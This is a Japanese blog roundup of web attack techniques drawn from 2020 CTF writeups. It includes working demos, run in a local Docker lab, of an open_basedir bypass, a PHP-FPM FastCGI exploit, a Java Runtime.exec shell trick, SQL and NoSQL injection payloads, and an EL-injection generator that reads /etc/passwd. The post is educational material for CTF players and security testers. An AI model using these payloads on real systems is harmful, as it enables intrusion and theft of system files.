【2020年】CTF Web問題の攻撃手法まとめ
- はじめに
- Remote Code Execution(RCE)
- Cross-Site Scripting(XSS)
- SQL Injection
- NoSQL Injection
- その他のInjection
- Server-Side Template Injection(SSTI)
- Local/Remote File Inclusion
- Directory Traversal
- Server-Side Request Forgery(SSRF)
- XML External Entity(XXE)
- Insecure Deserialization
- Prototype Pollution
- Regular expression Denial of Service(ReDoS)
- Side Channel Attack
- Cache Poisoning
- HTTP Request Smuggling
- JWT改ざん
- polyglot
- WebAssembly
- Machine Learning
- AWS
- GCP
- 最後に
はじめに
2020年のCTFイベントで出題されたWeb問題のwriteupを読んで、新しく知った攻撃手法やツールなどをピックアップして紹介します。
2019年の記事はこちらです。
graneed.hatenablog.com
2018年の記事はこちらです。
graneed.hatenablog.com
対象イベント
対象のイベントの条件は以下のとおりです。
- 2020年1月1日~12月31日までに開催されたイベントであること。
- Online開催であること。
- Jeopardy形式であること。
- Web問題であること。
読み方、使い方
量が膨大ですが、大まかに攻撃手法ごとに分類していますので、好きなところから読み始めて頂ければと思います。 また、CTFで詰まった時に攻撃の取っ掛かりを探すために参照したり、Webアプリケーションの脆弱性診断やバグバウンティでも活用できる部分があるかと思います。
それぞれ簡単に解説やPoCの結果を記載していますが、writeupのリンクも付けていますので、更に具体的な手法やコードを確認したい場合はそちらを参照ください。
Remote Code Execution(RCE)
本記事で紹介する多くの手法がRCEを取得すること目的としているため、 この章では、任意コードが実行できる状態になったあとに、何らかの制限をバイパスする手法を紹介します。
親ディレクトリ指定によるopen_basedirのバイパス
昨年度に引き続き、open_basedir
の制限がかかっている中、それをバイパスする問題が多数ありました。その制限をバイパスする手法をいくつか紹介します。
1つ目の手法はopen_basedir
を親ディレクトリ指定に更新する手法です。
以下の記事が参考になります。
https://flagbot.ch/posts/phuck3/
実際に試してみましょう。
# open_basedirで/var/www/html配下に限定 root@ip-172-31-6-71:/var/www/html# cat php_open_basedir.ini open_basedir = /var/www/html # インタラクティブモードで実験 root@ip-172-31-6-71:/var/www/html# php -a -c php_open_basedir.ini Interactive mode enabled # /etc/passwdが読み取れないことを確認 php > var_dump(file_get_contents("/etc/passwd")); Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/html) in php shell code on line 1 Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in php shell code on line 1 bool(false) # サブディレクトリに移動 php > chdir("img/"); # open_basedirを親ディレクトリの指定に更新 php > ini_set("open_basedir", "../"); # ルートディレクトリに移動 php > chdir("../"); # /var/www/html php > chdir("../"); # /var/www(open_basedirを更新していないと、この段階でエラーになる) php > chdir("../"); # /var/ php > chdir("../"); # / # /etc/passwdを読み取れたことを確認 php > var_dump(file_get_contents("/etc/passwd")); string(1652) "root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin (snip)
- writeup
- PoseidonCTF 1st Edition - Interview
https://st98.github.io/diary/posts/2020-08-10-poseidonctf.html#web-988-interview-7-solves
- PoseidonCTF 1st Edition - Interview
PHP-FPMのTCPソケット接続によるopen_basedirとdisable_functionsのバイパス
昨年のまとめでは、PHP-FPMのUnixドメインソケットファイルを使用したdisable_functions
のバイパス手法を紹介しましたが、こちらはTCPソケットを使用している場合の手法です。
PHP_VALUE
でopen_basedir
やdisable_functions
を上書きします。
リクエストデータの作成にはPHP FastCGI Clientを使用します。
https://github.com/adoy/PHP-FastCGI-Client
実際に試してみましょう。
まずは環境構築です。
Dockerfile
FROM php:7.4-fpm COPY php.ini /usr/local/etc/php/conf.d/php.ini COPY eval.php /tmp/eval.php
php.ini
open_basedir = /var/www/html
eval.php
<?php eval($_GET["eval"]);
コンテナをビルドして起動します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/php-fpm# docker build --no-cache -t php-fpm . Sending build context to Docker daemon 215.6kB Step 1/3 : FROM php:7.4-fpm ---> 25cccfd6786d Step 2/3 : COPY php.ini /usr/local/etc/php/conf.d/php.ini ---> 15d17449aad3 Step 3/3 : COPY eval.php /tmp/eval.php ---> b0d463ae3003 Successfully built b0d463ae3003 Successfully tagged php-fpm:latest root@kali:/mnt/hgfs/CTF/Writeup/2020/php-fpm# docker run --rm -p 9000:9000 --name php-fpm php-fpm [01-Aug-2021 06:23:23] NOTICE: fpm is running, pid 1 [01-Aug-2021 06:23:23] NOTICE: ready to handle connections
PHP FastCGI Clientを使用して、PHP-FPMがListenしている9000
番ポートに接続して/tmp/eval.php
を実行するコードです。PHP_VALUE
オプションでopen_basedir
を/
に上書きします。
exploit.php
<?php require 'vendor/autoload.php'; use Adoy\FastCGI\Client; // Existing socket, such as Lighttpd with mod_fastcgi: #$client = new Client('unix:///path/to/php/socket', -1); // Fastcgi server, such as PHP-FPM: $client = new Client('localhost', '9000'); $content = 'key=value'; echo $client->request( array( 'GATEWAY_INTERFACE' => 'FastCGI/1.0', 'REQUEST_METHOD' => 'POST', 'SCRIPT_FILENAME' => '/tmp/eval.php', 'SERVER_SOFTWARE' => 'php/fcgiclient', 'REMOTE_ADDR' => '127.0.0.1', 'REMOTE_PORT' => '9985', 'SERVER_ADDR' => '127.0.0.1', 'SERVER_PORT' => '80', 'SERVER_NAME' => 'mag-tured', 'SERVER_PROTOCOL' => 'HTTP/1.1', 'CONTENT_TYPE' => 'application/x-www-form-urlencoded', 'CONTENT_LENGTH' => strlen($content), 'PHP_VALUE' => 'open_basedir = /', 'QUERY_STRING' => 'eval=echo%20file_get_contents%28%27%2F/etc/passwd%27%29%3B', ), $content );
コードを実行します。php.iniでopen_basedir
を/var/www/html
に制限していたにもかかわらず、/tmp/eval.php
が実行できました。
root@kali:/mnt/hgfs/CTF/Writeup/2020/php-fpm/PHP-FastCGI-Client# php exploit.php X-Powered-By: PHP/7.4.22 Content-type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin (snip)
なお、PHP_VALUE
の行をコメントアウトしてopen_basedir
を上書きしないよう変更してから実行すると、勿論、エラーになります。
root@kali:/mnt/hgfs/CTF/Writeup/2020/php-fpm/PHP-FastCGI-Client# php exploit.php Unable to open primary script: /tmp/eval.php (Operation not permitted)Status: 404 Not Found X-Powered-By: PHP/7.4.22 Content-type: text/html; charset=UTF-8 No input file specified.
- writeup
- ASIS CTF Finals 2020 - More Secure Secrets
https://blog.srikavin.me/posts/asisctf20-abusing-php-constants-to-bypass-eval-filters/
- ASIS CTF Finals 2020 - More Secure Secrets
JavaのRuntime.execでシェルを実行
Javaで任意のコード実行ができる脆弱性を見つけてRuntime.exec
メソッドを実行できるようになったものの、
OSコマンドでパイプ(|
)やリダイレクト(>
)が上手く実行できない場合の手法です。
以下の記事が参考になります。
https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
実際に試してみましょう。
まずは実行時引数に渡された文字列をRuntine.exec
メソッドで実行するクラスを用意します。
Exec.java
import java.io.*; public class Exec { public static void main(String[] args) throws IOException { Process p = Runtime.getRuntime().exec(args[0]); byte[] b = new byte[1]; while (p.getErrorStream().read(b) > 0) System.out.write(b); while (p.getInputStream().read(b) > 0) System.out.write(b); } }
パイプやリダイレクトを使用したcat /etc/passwd | grep root > /tmp/hoge
というOSコマンドを実行できるかどうか試したところ、そのまま実行してもエラーになってしまいましたが、紹介されている手法を使うと、正常に実行できました。
# コンパイル root@kali:/mnt/hgfs/CTF/Writeup/2020/java-runtime-exec# javac Exec.java # パイプやリダイレクトに失敗 root@kali:/mnt/hgfs/CTF/Writeup/2020/java-runtime-exec# java Exec 'cat /etc/passwd | grep root > /tmp/hoge' cat: '|': No such file or directory cat: grep: No such file or directory cat: root: No such file or directory cat: '>': No such file or directory root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin (snip) # 実行に成功 root@kali:/mnt/hgfs/CTF/Writeup/2020/java-runtime-exec# java Exec 'sh -c $@|sh . echo cat /etc/passwd | grep root > /tmp/hoge' root@kali:/mnt/hgfs/CTF/Writeup/2020/java-runtime-exec# cat /tmp/hoge root:x:0:0:root:/root:/bin/bash
- writeup
- Insomni'hack teaser 2020 - Defiltrate - Part1
https://github.com/empty-jack/ctf-writeups/blob/master/Insomni-hack-teaser-2020/web-defiltrate-part1.md
- Insomni'hack teaser 2020 - Defiltrate - Part1
Cross-Site Scripting(XSS)
nginx環境でHTTPステータスコードが操作できる場合にCSPヘッダーを無効化
HTTPレスポンスのステータスコードが操作可能であること、且つnginxのadd_header
でCSPヘッダーを設定している場合、
nginxのadd_header
では特定のステータスコードでないと追加されないことを利用して、CSPヘッダーを無効化する手法です。
確かにnginxのドキュメントにも記載されています。
https://nginx.org/en/docs/http/ngx_http_headers_module.html#add_header
- writeup
- Codegate CTF 2020 Preliminary - CSP
https://balsn.tw/ctf_writeup/20200208-codegatectf2020quals/#csp
- Codegate CTF 2020 Preliminary - CSP
GoogleのClosureLibraryサニタイザーのXSS脆弱性
Google検索、Gmail、Googleドキュメント等で使用されている、ClosureLibraryサニタイザーの脆弱性を突いて、XSSを発動させる手法です。 writeupに具体的なpayloadが記載されています。
また、writeupに記載されているリンク先も参考になります。
https://research.securitum.com/the-curious-case-of-copy-paste/
- writeup
- Google CTF 2020 - SafeHTMLPaste
https://blog.bi0s.in/2020/08/26/Web/GoogleCTF20-SafeHtmlPaste/
- Google CTF 2020 - SafeHTMLPaste
WebのProxy機能を介したService Workerの登録
昨年のまとめでもService Workerを使用した問題を紹介しましたが、2020年はDEF CON CTF Qualifierで出題されました。
同一オリジンとして提供されるコンテンツを操作可能且つ管理者にWebブラウザでそのコンテンツに誘導できる場合に、Service Workerを使用することで管理者から以降の画面遷移先の情報を窃取できる手法です。
DEF CON CTF Qualifier 2020のpoootという問題では、https://pooot.challenges.ooo/example.com/
にアクセスすると、
https://example.com/
を表示してくれるWebのProxyサービスが提供されていました。
feedback機能で管理者にURLを送るとそちらにアクセスしてくれており、また管理者はFLAGの提供先URLにも定期的にアクセスしているようでした。
そこで、自分のサーバーに、画面遷移ごとにそのURL情報を攻撃者のサーバーに送信するようなService Workerを配備し、
https://pooot.challenges.ooo/myserver.com/sw_install.html
というURLを管理者に送信することで、
管理者のWebブラウザの画面遷移先のURL情報を窃取することができます。
- writeup
- DEF CON CTF Qualifier 2020 - pooot
https://infosecwriteups.com/pooot-writeup-217384a6b69c
https://gist.github.com/nerder/aaadefee9f0e2a17034cb5abd9b86eed
- DEF CON CTF Qualifier 2020 - pooot
括弧を使わないXSS
WAFやフィルタ機能で(
や)
の記号を使用できない場合でも、XSSを発動させる手法です。
以下の記事が参考になります。
https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md
https://terjanq.medium.com/arbitrary-parentheses-less-xss-e4a1cf37c13d
/
記号を使用せずに遷移先URLを指定
WAFやフィルタ機能で/
記号が使用できない場合でも、http:DOMAIN_OR_IP:PORT
で回避できます。
実際にChromeで以下のコードを実行すると、example.com
に画面遷移しました。
location.href="http:example.com"
- writeup
- RCTF 2020 - RBlog 2020
https://blog.rois.io/en/2020/rctf-2020-official-writeup-2/#rBlog_2020
- RCTF 2020 - RBlog 2020
SOME(Same Origin Method Execution)を利用してdocument.writeを順次実行
JSONPエンドポイントに問題があってSOME(Same Origin Method Execution)ができるものの、引数として渡せる文字数に制約がある場合に、
JSONPのコールバック関数に別フレームのdocument.write
関数を指定し、パラメータに実行したいコードを分割した文字列を渡したものを複数回呼び出すことで、
最終的に目的のコードを組み立ててXSSを発動させる手法です。
SOMEの説明は以下の記事が参考になります。
http://www.benhayak.com/2015/06/same-origin-method-execution-some.html
こちらの手法のPoCは以下で確認できます。(但し、2021年8月時点の最新版のGoogle Chromeでは動作しませんでした。) https://l0.cm/xss_202006/solution.html
- writeup
- AppSec-IL 2020 CTF - SomeVideos
https://cmdengineer.medium.com/jsonp-some-xss-87b200ef7d02
https://jctf.team/AppSec-IL-2020/SomeVideos/
- AppSec-IL 2020 CTF - SomeVideos
SQL Injection
MySQLでinformation_schemaを使用せずに未知のテーブルから情報取得
WAFやフィルタ機能でinformation_schema
を参照できない場合に、
FLAGが格納されているテーブルを探し出してレコードを取得する手法です。
DBMSはMySQLが前提です。
TetCTFのSecure Systemという問題では、in
という文字列を使用できない制約がありinformation_schema
を参照できないため、
テーブル名と列名を特定するのが困難になっていました。
テーブル名はsys.schema_table_statistics
という、テーブルの統計が格納されたビューを使用して取得できます。
https://dev.mysql.com/doc/refman/8.0/ja/sys-schema-table-statistics.html
そして、列名がわからなくても、以下のSQL構文でBlind SQL Injectionを実行可能です。
SELECT (SELECT 1, 'aa') = (SELECT * FROM example)
exampleテーブルの2列目が、aa
と一致していれば1
が返却されます。不一致であれば0
が返却されます。
あとは、通常のBlind SQL Injectionと同様に、=
記号の代わりに<
や>
記号を使用するスクリプトを作れば、1文字ずつ特定可能となります。
但し、このSQLでは大文字・小文字を判別できません。 判別する方法はここでは省略しますので、以下のwriteupを参照ください。
- writeup
- TetCTF - Secure System
https://terjanq.medium.com/blind-sql-injection-without-an-in-1e14ba1d4952
- TetCTF - Secure System
PostgreSQLでUTF-16による列名の指定と'記号を使用しない文字列宣言
ちょっとしたテクニックですが、PostgreSQLではUTF-16の文字コードで記載した文字列で列名を指定できます。
また、通常、文字列宣言をする場合は'
記号で括りますが、$$
記号で代替することができます。
どちらも、WAFやフィルタ機能のバイパスに利用できます。
実際に試してみましょう。
まずは環境構築です。Dockerを使用してPostgreSQLを起動し、検証用のテーブルを作成します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/postgresql# docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres Unable to find image 'postgres:latest' locally (snip) root@kali:/mnt/hgfs/CTF/Writeup/2020/postgresql# docker exec -it some-postgres /bin/sh # psql -U postgres psql (13.3 (Debian 13.3-1.pgdg100+1)) Type "help" for help. postgres=# CREATE TABLE example (id int, username text, password text); CREATE TABLE postgres=# INSERT INTO example VALUES (1, 'admin', 'p@ssw0rd'); INSERT 0 1 postgres=# SELECT * FROM example; id | username | password ----+----------+---------- 1 | admin | p@ssw0rd (1 row)
UTF-16の文字コードで記載した文字列で列名を指定しSELECT文を実行してみると、確かに正常に実行できました。
postgres=# SELECT U&"\0075\0073\0065\0072\006E\0061\006D\0065" FROM example; username ---------- admin (1 row)
$$
記号で文字列宣言もできました。
postgres=# SELECT $$HOGE$$; ?column? ---------- HOGE (1 row)
- writeup
- InCTF 2020 - GoSQLv3
https://jorgectf.gitlab.io/post/inctf-gosqlv3/
https://ctftime.org/writeup/22830
- InCTF 2020 - GoSQLv3
SQLiteで16進数表記による列名の指定
同じく、ちょっとしたテクニックですが、SQLiteでは列名を16進数表記で指定できます。
WAFやフィルタ機能のバイパスに利用できます。
実際に試してみましょう。
まずは環境構築です。Dockerを使用してSQLiteを起動し、検証用のテーブルを作成します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/sqlite# docker run --rm -it nouchka/sqlite3 SQLite version 3.27.2 2019-02-25 16:06:06 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> CREATE TABLE example(id, name); sqlite> INSERT INTO example VALUES(1, "hoge");
hoge
の16進数表記を確認します。
>>> "hoge".encode('utf-8').hex() '686f6765'
先頭にx
を付けて'
で括ると16進数表記で指定できます。
sqlite> SELECT x'686f6765' FROM example; hoge
但し、テーブル名には指定できません。
>>> "example".encode('utf-8').hex() '6578616d706c65' sqlite> SELECT x'686f6765' FROM x'6578616d706c65'; Error: near "x'6578616d706c65'": syntax error
- writeup
- ASIS CTF Quals 2020 - Old School
https://vuln.live/blog/10
- ASIS CTF Quals 2020 - Old School
gRPCのアプリケーションに対するSQLインジェクション
公開されているコードを読むとSQLインジェクションの対象は明らかですが、インターフェースがgRPCというのがポイントです。 普通にWebブラウザでアクセスしても何も表示されません。
githubで問題が公開されており、Dockerで簡単に環境構築できるようになっていたため、やってみましょう。
まずは環境構築です。README.mdに記載されている通りに実行します。
時間とリソースの節約のため、light_sequelの問題のコンテナのみ起動するようdocker-compose.yaml
をカスタマイズしましたが、そのままでも大丈夫だと思います。
root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# git clone https://github.com/wectf/2020 root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# cd 2020 && docker-compose up
次に、writeupを参考にgRPCのクライアントとなるコードを作成します。 writeupではimport文が省略されていたため補います。
exploit.go
package main import ( "fmt" "golang.org/x/net/context" "google.golang.org/grpc" "google.golang.org/grpc/metadata" proto "light_sequel/proto" ) func main() { conn, err := grpc.Dial("localhost:1004", grpc.WithInsecure()) if err != nil { panic(err) } defer conn.Close() srvc := proto.NewSrvClient(conn) md := metadata.New(map[string]string{"user_token": "')) union select flag from flags--"}) ctx := metadata.NewOutgoingContext(context.Background(), md) srvreq := proto.SrvRequest{} srvresp, err := srvc.GetLoginHistory(ctx, &srvreq) if err != nil { panic(err) } fmt.Println(srvresp) }
次にgRPCのクライアントをビルドする環境準備ですが、gRPC何もわからない状態でしたので、以下の記事を参考にしました。
https://qiita.com/marnie_ms4/items/4582a1a0db363fe246f3
# grpcのインストール root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# go get -u google.golang.org/grpc # protocのインストール root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# wget https://github.com/protocolbuffers/protobuf/releases/download/v3.17.3/protoc-3.17.3-linux-x86_64.zip root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# unzip protoc-3.17.3-linux-x86_64.zip root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# mv bin/* /usr/local/bin/ root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# mv include/* /usr/local/include/ # protocのGo用のプラグインをインストール root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# go get -u github.com/golang/protobuf/protoc-gen-go
この段階でビルドしてみますが、エラーになります。
root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# go build exploit.go exploit.go:8:2: cannot find package "light_sequel/proto" in any of: /usr/local/go/src/light_sequel/proto (from $GOROOT) /root/go-workspace/src/light_sequel/proto (from $GOPATH)
配布されているインターフェースファイルを持ってきて、環境変数GOPATH
に設定してから、再度ビルドすると成功しました。
root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# ls -la ./src/light_sequel/proto/ total 14 drwxrwxrwx 1 root root 0 Aug 3 15:50 . drwxrwxrwx 1 root root 0 Aug 3 16:16 .. -rwxrwxrwx 1 root root 13776 Aug 3 15:50 main.pb.go -rwxrwxrwx 1 root root 433 Aug 3 16:18 main.proto root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# GOPATH=$GOPATH:/mnt/hgfs/CTF/Writeup/2020/grpc root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# go build exploit.go
実行するとFLAGが取得できました。
root@kali:/mnt/hgfs/CTF/Writeup/2020/grpc# ./exploit ip:"we{00000000-0000-0000-0000-000000000000@demo-flag}"
- writeup
- WeCTF 2020 - Light Sequel
https://freeeve.github.io/ctf-writeups/posts/2020/wectf/light-sequel/
- WeCTF 2020 - Light Sequel
NoSQL Injection
MongoDBでJavaScript形式のクエリを使用したBlind NoSQL Injection
MongoDBでは、$where
演算子を使用してJavaScript形式でクエリを記述できます。
https://docs.mongodb.com/manual/reference/operator/query/where/
Square CTF 2020のDeep Web Blogという問題では、NoSQL Injectionの脆弱性があるものの、HTTPレスポンス内にFLAG文字列が含まれていると除去されてしまいました。 そこで、予想するFLAG文字列が部分一致したかどうかで応答結果が変わるようなクエリをJavaScriptで記載することで、 Blind SQL Injectionのように、1文字ずつFLAG文字列を特定可能となります。
実際に試してみましょう。
まずは環境構築です。Dockerを使用してMongoDBの環境を立てて、適当なFLAG文字列(flag{dummy}
)を設定したレコードを追加します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/mongodb# docker run --rm --name mongo -d mongo 6e687e3ca2b0ccc3f71d12282031254c1edf46dbe8bbeadf8f774a359cd5a9d0 root@kali:/mnt/hgfs/CTF/Writeup/2020/mongodb# docker exec -it mongo /bin/sh # mongo MongoDB shell version v5.0.1 connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb (snip) > use posts switched to db posts > db.posts.insert({title:'flag', content:'flag{dummy}'}); WriteResult({ "nInserted" : 1 })
FLAG文字列がflag{a
に部分一致するかどうかを確認すると、何も返却されません。
> db.posts.find({"$where": "function(){if(this.content!=undefined){return this.content.includes('flag{a')} else {return false}}"})
FLAG文字列がflag{d
に部分一致するかどうかを確認すると、結果が返却されました。
> db.posts.find({"$where": "function(){if(this.content!=undefined){return this.content.includes('flag{d')} else {return false}}"}) { "_id" : ObjectId("610976399b9e9a736e1e1833"), "title" : "flag", "content" : "flag{dummy}" }
これで、応答があったかどうかだけわかれば、1文字ずつ特定できそうです。
- writeup
- Square CTF 2020 - Deep Web Blog
http://ajmalsiddiqui.me/blog/squarectf-2020-deep-web-blog/
- Square CTF 2020 - Deep Web Blog
MongoDBのObjectIDを予測するライブラリ
MongoDBのObjectID
は、ランダム部分があるものの、既に有効なオブジェクトIDを知っていれば、予測可能となっています。
https://docs.mongodb.com/manual/reference/method/ObjectId/
ObjectID
を予測してブルートフォースするライブラリが公開されています。
https://github.com/andresriancho/mongo-objectid-predict
なお、過去にångstromCTF 2018のThe Best Websiteという問題で出題されていたことがあります。
https://rawsec.ml/en/angstromCTF-2018-write-ups/#230-the-best-website-web
- writeup
- AppSec-IL 2020 CTF - HR Agency
https://jctf.team/AppSec-IL-2020/HR-Agency/
- AppSec-IL 2020 CTF - HR Agency
その他のInjection
Apache Solr Injection
Apache Solrというオープンソースの全文検索システムに対するインジェクション攻撃手法です。
以下の記事が参考になります。
https://github.com/veracode-research/solr-injection
nullcon HackIM 2020のsolar energyという問題では、ShowFileRequestHandler
を使用して、configディレクトリ内のファイルのリスティングとファイルを読み取る手法が使われました。
https://solr.apache.org/docs/7_7_0/solr-core/org/apache/solr/handler/admin/ShowFileRequestHandler.html
- writeup
- nullcon HackIM 2020 - solar energy
https://ctftime.org/writeup/18451
- nullcon HackIM 2020 - solar energy
'
や"
を使用せずにExpression Language Injectionで任意のOSコマンド実行
JavaでExpression Language Injectionの脆弱性があり、
且つWAFやフィルタ機能で'
や"
記号をブロックされている場合に、
それら記号を使用した文字列表現なしに、任意のOSコマンドを実行する手法です。
以下のページで解説されています。
https://pulsesecurity.co.nz/articles/EL-Injection-WAF-Bypass
実際に試してみましょう。
任意の文字列を、'
や"
記号を使用せずに文字列として取得可能なコードに変換するスクリプトです。
Gen-Payload.py
import sys payload = sys.argv[1] print ("true.toString().charAt(0).toChars(%d)[0].toString()" % ord(payload[0]), end='') for i in range(1, len(payload)): print (".concat(true.toString().charAt(0).toChars(%d)[0].toString())" % ord(payload[i]), end='') print ("")
スクリプトを使用して、java.lang.Runtime
文字列と、実行したいOSコマンドの文字列を取得するコードを生成します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/java-EL# python3 Gen-Payload.py "java.lang.Runtime" true.toString().charAt(0).toChars(106)[0].toString().concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(82)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()) root@kali:/mnt/hgfs/CTF/Writeup/2020/java-EL# python3 Gen-Payload.py "cp /etc/passwd /tmp/passwd" true.toString().charAt(0).toChars(99)[0].toString().concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString())
生成したコードを使用してコード全体を組み立てて、EL式として実行する、テスト用のコードを書きます。
Main.java
import de.odysseus.el.ExpressionFactoryImpl; import de.odysseus.el.util.SimpleContext; import javax.el.*; public class Main { public static void main(String[] args) { ExpressionFactory factory = new ExpressionFactoryImpl(); SimpleContext context = new SimpleContext(); String javalangRuntime = "true.toString().charAt(0).toChars(106)[0].toString().concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(118)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(108)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(103)[0].toString()).concat(true.toString().charAt(0).toChars(46)[0].toString()).concat(true.toString().charAt(0).toChars(82)[0].toString()).concat(true.toString().charAt(0).toChars(117)[0].toString()).concat(true.toString().charAt(0).toChars(110)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(105)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString())"; String command = "true.toString().charAt(0).toChars(99)[0].toString().concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(101)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(99)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString()).concat(true.toString().charAt(0).toChars(32)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(116)[0].toString()).concat(true.toString().charAt(0).toChars(109)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(47)[0].toString()).concat(true.toString().charAt(0).toChars(112)[0].toString()).concat(true.toString().charAt(0).toChars(97)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(115)[0].toString()).concat(true.toString().charAt(0).toChars(119)[0].toString()).concat(true.toString().charAt(0).toChars(100)[0].toString())"; String pl = "ABC ${true.getClass().forName(" + javalangRuntime + ").getMethods()[6].invoke(true.getClass().forName(" + javalangRuntime + ")).exec(" + command + ")}"; ValueExpression e = factory.createValueExpression(context, pl, String.class); System.out.println(e.getValue(context)); } }
コンパイルして実行すると、OSコマンドの実行に成功したことを確認できます。./lib/
配下には、tomocatとjuelのjarファイルを配備しています。
root@kali:/mnt/hgfs/CTF/Writeup/2020/java-EL# javac -cp "./:./lib/*" Main.java root@kali:/mnt/hgfs/CTF/Writeup/2020/java-EL# java -cp "./:./lib/*" Main ABC Process[pid=4127104, exitValue=0] root@kali:/mnt/hgfs/CTF/Writeup/2020/java-EL# cat /tmp/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin (snip)
- writeup
- CONFidence CTF 2020 Finals - Password Manager
https://balsn.tw/ctf_writeup/20200905-confidence2020ctffinals/#password-manager
こちらのwriteupから解説サイトにリンクが張られていましたが、特にこの問題ではWAFのバイパスを必要としていなかったようです。
- CONFidence CTF 2020 Finals - Password Manager
Server-Side Template Injection(SSTI)
flaskのSSTI脆弱性を利用してHTTPトンネリング
flaskのアプリケーションにSSTIの脆弱性を発見した後、 そこからHTTPトンネルを張るコードを実行して、ネットワーク内部にアクセスする手法です。
